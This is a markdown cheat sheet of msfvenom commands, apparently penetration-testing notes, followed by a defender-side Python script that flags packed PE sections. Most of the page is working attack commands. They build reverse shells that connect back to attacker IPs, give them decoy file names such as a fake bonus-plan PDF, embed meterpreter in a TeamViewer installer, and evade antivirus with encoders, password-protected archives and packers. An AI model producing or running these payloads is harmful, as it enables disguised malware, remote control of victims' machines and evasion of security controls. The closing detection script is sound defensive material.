# msfvenom

## Listing Payloads

```bash
msfvenom -l payloads
```

## Staged vs Stageless payloads

`windows/meterpreter/reverse_tcp` vs `windows/meterpreter_reverse_tcp`

The former is staged: after the platform/architecture part, each `/` separates a stage, so `reverse_tcp` is the small stager that connects back and downloads the `meterpreter` stage. The latter has an `_` instead of a `/` after the meterpreter part, so the whole payload ships in one piece and is stageless.

## Creating a payload

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > BonusCompensationPlanpdf.exe
```

```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
```

* `-p` payload to build
* `-f` output format

## List options

```bash
msfvenom -p java/jsp_shell_reverse_tcp --list-options
```

## Basic msfvenom

```bash
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>
```

One can also use `-a` to specify the architecture or `--platform` to specify the target platform.

Listing payloads and encoders:

```bash
msfvenom -l payloads  # payloads
msfvenom -l encoders  # encoders
```

### Common params when creating a shellcode

```bash
-b "\x00\x0a\x0d"
-f c
-e x86/shikata_ga_nai -i 5
EXITFUNC=thread
PrependSetuid=True  # create shellcode that runs with SUID privileges
```

## Encoding

```shell-session
-b "\x00" -e x86/shikata_ga_nai
```

* `-b` bad characters the shellcode must not contain
* `-e` encoder to use

## Antivirus evasion

Hiding the payload inside a legitimate executable:

```shell-session
msfvenom -p windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5
```

* `-i` number of encoding iterations
* `-k` keep the template's normal behaviour and run the payload in a new thread
* `-x` template executable to embed the payload into
* `-o` output file

### Archiving

Use multiple zip/rar/compression layers with passwords to evade detection on the network.

### Packing

A list of popular packer software:

* [UPX packer](https://upx.github.io)
* [The Enigma Protector](https://enigmaprotector.com)
* [MPRESS](https://web.archive.org/web/20240310213323/https://www.matcode.com/mpress.htm)
* Alternate EXE Packer
* ExeStealth
* Morphine
* MEW
* Themida

Also see [PolyPack](https://jon.oberheide.org/files/woot09-polypack.pdf).
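As an added defender-side example (not from this page or from Metasploit), a stdlib-only Python triage script that parses a PE's section table and flags what the encoding, template-embedding and packing techniques above tend to leave behind: high-entropy sections, sections that are both writable and executable, and UPX section names. `build_sample_pe` constructs a synthetic two-section PE purely as test input; the function names and the 7.0 bits/byte threshold are my own heuristic choices.

```python
import math
import struct
from collections import Counter
MEM_EXECUTE, MEM_WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_WRITE

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant filler, 8.0 for uniformly distributed bytes."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def parse_pe_sections(pe: bytes) -> list:
    """Walk MZ header -> e_lfanew -> COFF header -> section table (stdlib only)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    count = struct.unpack_from("<H", pe, coff + 2)[0]                # NumberOfSections
    table = coff + 20 + struct.unpack_from("<H", pe, coff + 16)[0]   # skip SizeOfOptionalHeader
    out = []
    for off in range(table, table + 40 * count, 40):                 # 40-byte IMAGE_SECTION_HEADERs
        name = pe[off:off + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, off + 16)  # SizeOfRawData, PointerToRawData
        chars = struct.unpack_from("<I", pe, off + 36)[0]            # Characteristics
        out.append({"name": name, "entropy": shannon_entropy(pe[raw_ptr:raw_ptr + raw_size]), "chars": chars})
    return out

def flag_sections(sections: list, entropy_threshold: float = 7.0) -> list:
    """Heuristic triage: (name, reasons) for sections that look packed, encoded or RWX."""
    checks = (
        (lambda s: s["entropy"] > entropy_threshold, "high entropy (packed or encoded data)"),
        (lambda s: s["chars"] & MEM_EXECUTE and s["chars"] & MEM_WRITE, "writable and executable"),
        (lambda s: s["name"].upper().startswith("UPX"), "UPX packer section name"),
    )
    findings = [(s["name"], [why for test, why in checks if test(s)]) for s in sections]
    return [f for f in findings if f[1]]

def build_sample_pe() -> bytes:
    """Constructed two-section PE used only as test input; not a runnable binary."""
    text, blob = b"\x90" * 200, bytes(range(256)) * 2    # entropies 0.0 and exactly 8.0
    hdrs, body, base = b"", b"", 0x40 + 4 + 20 + 2 * 40  # raw data starts right after the section table
    for name, data, chars in ((b".text", text, 0x60000020), (b".data", blob, 0xE0000040)):
        hdrs += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(data), 0x1000, len(data), base + len(body), 0, 0, 0, 0, chars)
        body += data
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)           # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)   # i386, 2 sections, no optional header
    return dos + b"PE\0\0" + coff + hdrs + body

if __name__ == "__main__":
    for name, reasons in flag_sections(parse_pe_sections(build_sample_pe())):
        print(f"{name}: {', '.join(reasons)}")
```

To triage a real file, pass `open(path, "rb").read()` to `parse_pe_sections`; a modified template or a packed binary usually shows up as a new or renamed section with entropy close to 8 bits/byte, which is a lead for comparison against the vendor's known-good hash, not a verdict.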

